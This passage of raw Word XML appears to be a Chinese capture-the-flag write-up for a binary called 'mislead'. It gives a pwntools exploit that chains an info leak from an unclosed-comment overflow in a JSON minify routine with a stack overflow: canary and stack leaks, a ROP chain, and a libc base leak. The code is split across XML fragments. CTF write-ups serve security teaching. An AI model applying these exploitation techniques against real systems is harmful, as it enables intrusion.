        <w:t>删除注释时未闭合时溢出，导致内存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concat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>从而泄露内存信息，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4501E7" w14:textId="419A627F" w:rsidR="000C39FB" w:rsidRPr="00EF164C" w:rsidRDefault="000C39FB" w:rsidP="000C39FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>配合上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CreateJson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中的栈溢出可以</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>getshell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39FB" w:rsidRPr="00372828" w14:paraId="01599E6C" w14:textId="77777777" w:rsidTr="00414E95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E66D2A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from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pwn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import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09AC6BC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from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binascii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import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hexlify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as h</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36AF3E42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>from time import sleep</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BF42DB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from sys import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argv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="618A80B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197A134E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>#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context.log_level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"debug"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B434AB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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>libc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ELF("/lib/x86_64-linux-gnu/libc-2.27.so")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F96FF5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3ECF705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>def choice(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menu,select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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3716C15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io.sendlineafter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menu,str</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(select))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F03A50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def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sendJson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size,json</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>,show,gg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>=True):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49DF04D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choice(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"(-1/0/1)",1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCA6DE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choice("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Len:</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>",size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6FE7D63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if size &lt; 0x100:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C10FF6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io.sendlineafter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Str:",json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) if gg == True else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io.sendafter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>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Str:",json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2321DD2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io.recvuntil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("RAW DATA:")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="652E858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leak =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io.recvline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()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44C63E4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buf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(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="044FEB4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if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buf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== "W":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0901F98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choice("(0/1)</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>",show</w:t>
            </w:r>
            <w:proofErr w:type="gram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2BCF929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info(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"JSON ON HEAP")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55380BD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elif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buf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== 'V':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="622C090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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    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info(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"JSON ON STACK")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E635963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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="546910DE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info(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"INCORRECT JSON")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DB8EFA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return leak</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AD00104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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38C3B44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io.sendlineafter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id:",json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[0])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46E78F4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io.sendlineafter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data",json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[1])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C70C3A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def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delJson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idx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D0EB93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choice(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"(-1/0/1)",-1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E4E4E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choice("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Idx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>",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idx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102F1F6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io.recvuntil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("Removement done")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AD595C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return</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EE0C75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404B535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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>while(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>True):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24C9975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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64BE95F4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if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len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argv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>)==1:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E8B8CD3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io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process(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"./</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>mislead")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AA67D0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elif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len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argv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>)==3:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7017517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io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remote(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argv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>[1</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>],int</w:t>
            </w:r>
            <w:proofErr w:type="gram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argv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>[2]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="499DB0A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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="418ECFE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critical(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"INVALID ARGV")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ECADDE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67B0EDD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info(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>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FengShui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for leak heap base @ size 0x40\n\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09A05C8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sendJson(0x80,'{"id":"","data":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}',0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="680A1BE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[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sendJson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(0x3f,'{"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id":"","data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":""}',1) for _ in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range(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>3)]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66DC5E1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delJson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gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F1303B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delJson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gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0781FEB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= '{"id":"","data":"%s"}'%'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="211467C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'/*'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26DEF05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hbase_40 = u64(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sendJson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(0x3</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>f,payload</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>,0)[0x3d:0x42].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ljust</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(8,'\x00'))&lt;&lt;8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51B76E1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success(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"JE_HBASE@0x40 -&gt; %#x"%hbase_40)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0507F19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#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gdb.attach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io</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>,'b* cJSON_Minify+250')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CCC7B1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info(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>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FengShui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for leak stack\n\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B9AC22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leak =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sendJson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(0x27,"a"*0x21+"/*\x00\x00/*",</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0,gg</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B18014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canary = u64(leak[0x21:0x28</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>].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ljust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(8,'\x00'))&lt;&lt;8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52F4EA6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stack = u64(leak[0x28:0x2e</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>].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ljust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(8,'\x00'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18D1A92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assert (stack&gt;=0x7f0000000000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E52B29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success(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"CANARY -&gt; %#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x"%canary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059AA6B3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success(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"STACK -&gt; %#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x"%stack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18F9D1F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#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gdb.attach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io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,'b*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createJSON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')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42F86EE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("(enter to pass):","d"*0x2c+"/*")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FC492E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("(enter to pass):","d"*0x28+p64(canary))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4343833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io.sendafter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("(enter to pass):","\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="100E187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07CD899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binary = ELF(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"./</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>mislead")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7325139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706D739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pop_rdi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0x0000000000405f03</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F8BC94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pop_rbp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0x0000000000401273</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E67475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ppop_rsi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0x0000000000405f01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B27C83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lpop_rdx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0x0000000000001b96</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5037CA8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lpop_rax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0x00000000000439c8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0760946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syscall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0x00000000000d2975</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F28F4BA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014152D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= 'B'*8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4214090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'C'*0x10+'A'*0xe0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15AC16B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p64(0xf0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F0F58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p64(stack-(0x7ffe804d9370-0x7ffe804d8ac</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0)+</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0x200)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0807FD9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p64(0x400fc9)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3598FAA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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>401274)*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>22#'a'*0xb0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48D590BE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p64(stack-(0x7fff41dd5e60-0x7fff41dd57b0</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>))#</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0xf0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="441EB75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p64(canary)*7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="696B86A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'a'*0x600</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D19818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p64(stack-0x90)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="368B994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p64(canary)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2483DBD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p64(stack-0x20)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7196610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pop_rdi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311669F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binary.got</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>['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printf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>'])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43ED24B1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p64(0x4011ed)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BA577F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gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0)*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15F7F42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p64(canary)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="645E69A3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gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0)*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15077A8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pop_rbp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5AF3EDC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p64(stack-(0x7ffe804d9370-0x7ffe804d8ac</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0)+</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0x100)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF68EC3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p64(0x40165c)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FCFBF02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p64(0x400fd3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FDF865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sendJson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(0x7</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>ff,[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"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fuck",payload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>],0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D31B6E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#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io.interactive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()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5742D36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io.recvuntil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('"\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39B5BAB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raw_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>input</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"SOMETHING STUCK")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BC8C837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#print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()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B58F44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lbase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= u64(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(7)[1:].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ljust</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(8,'\x00'))-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libc.sym</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>['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printf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C038B5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
